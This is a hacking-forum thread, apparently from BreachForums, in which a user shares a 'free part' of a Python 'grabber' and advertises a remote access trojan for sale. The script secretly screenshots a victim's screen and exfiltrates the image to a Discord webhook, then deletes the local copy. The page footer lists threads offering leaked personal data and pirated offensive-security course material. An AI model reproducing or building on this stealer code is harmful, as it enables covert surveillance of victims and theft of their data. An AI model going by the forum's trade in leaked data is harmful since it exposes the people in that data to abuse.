a free part of my grabber
by stackunderflow - Wednesday June 5, 2024 at 10:02 AM
#1
im working on a rat in like 3 days it will be done i will sell it for 40$ lifetime dm me

null
import os
from discord_webhook import DiscordWebhook, DiscordEmbed
from PIL import ImageGrab
user = os.path.expanduser("~")
hook =""
def screen():
    sss = ImageGrab.grab()
    temp_path = os.path.join(user, "AppData\\Local\\Temp\\ss.png")
    sss.save(temp_path)
    webhook = DiscordWebhook(url=hook)
    embed = DiscordEmbed(title="Screenshot", description="Latest screenshot capture.", color=242424)
    embed.set_author(name="kggrabber", icon_url="")
    embed.set_image(url="")
    embed.set_footer(text="kalogz on breachforums")
    webhook.add_embed(embed)
    webhook.execute()
    webhook = DiscordWebhook(url=hook)
    with open(temp_path, "rb") as f:
        webhook.add_file(file=f.read(), filename='ss.png')
    webhook.execute()
    try:
        os.remove(temp_path)
    except Exception as e:
        print(f"Error removing file: {e}")
screen()
Reply
#2
bro please .......
Ban reason: Arrested (Permanent)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  (FREE) OSINT TOOLS + DATABASE SEARCH ENGINES xpjelly 842 24,975 4 hours ago
Last Post: rayenn
  [FREE] Leaked Data Search Engine (10+ Terabytes of data, NO REDACTED DATA) 0btkop 260 7,053 Yesterday, 05:19 PM
Last Post: niceboy222
  [FREE] Latest OSEP / PEN-300 - complete course PDF + videos Tamarisk 1,071 94,019 09-10-2026, 03:27 PM
Last Post: Badgoldenwater
  HACKING FORUMS PART 3 Boat 167 7,044 09-10-2026, 01:27 PM
Last Post: percocet
  [FREE] Retired Offensive Security OSWE / WEB-300 exam writeups Tamarisk 1,071 90,925 09-09-2026, 03:30 AM
Last Post: kannetea



 Users browsing this thread: